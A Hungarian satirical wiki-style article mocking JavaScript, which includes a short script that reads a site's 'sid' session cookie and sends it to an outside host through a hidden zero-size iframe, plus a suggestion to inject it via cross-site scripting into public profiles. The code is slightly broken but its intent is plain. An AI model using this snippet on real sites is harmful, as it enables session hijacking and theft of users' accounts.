Javascript

A javascript egy kedves kis sandbox mások adatainak ellopásához, mindent tud amit a Java is, hiszen platformfüggetlen!

Mire is jó a dzsuvaszkript

Természetesen egy böngészőbe nagyon kell böngészőben futó program is, hogy kényelmesen hozzáférhessenek például mindenhez amivel éppen dolgozol. Mivel az átlagenber túl hülye ahhoz, hogy letiltsa, ezért kellően elkészített weblappal nagyjából bármit megtudhatunk róla, például a kukija méretét is.

Kukiméret lekérdezése

A href.hu arra is jó, hogy szerencsétlen enber azt se tudja mi az isten viharvert péniszét is látogat meg, ezért természetesen rögtön átirányíthatjuk egy erre készített weblapra is, ami mondjuk a következőt tartalmazza:

window.onload=function(){
function get_cookie ( cookie_name )
{
  var results = document.cookie.match ( '(^|;) ?' + cookie_name + '=([^;]*)(;|$)' );

  if ( results )
    return ( unescape ( results[2] ) );
  else
    return null;
}
var x1 = get_cookie("sid");
var k17 = "<iframe src='http://somedomain.com/do.php?sid="+x1+"' width=0 height=0 style='border:0px;'></iframe>";
document.innerHTML=document.innerHTML+k17;

vagy valami hasonló. Persze okosabb valami xss szerű támadással például publikus profilokba csempészni, mondjuk privi.hun. Példa tartalom teljes felülírására: [1]

Hint

Ugyan ma már ritka az olyan oldal ami kizárólag cookieval azonosít, pl. hashelt jelszót tárolva, azért még sessionidket szépen lehet szerezgetni a dologgal, de persze Loherén semmi ilyesmi nem működik, ugyanis a Lohere tökéletes.

Megoldás

Mondjuk nem mész netre enélkül [2]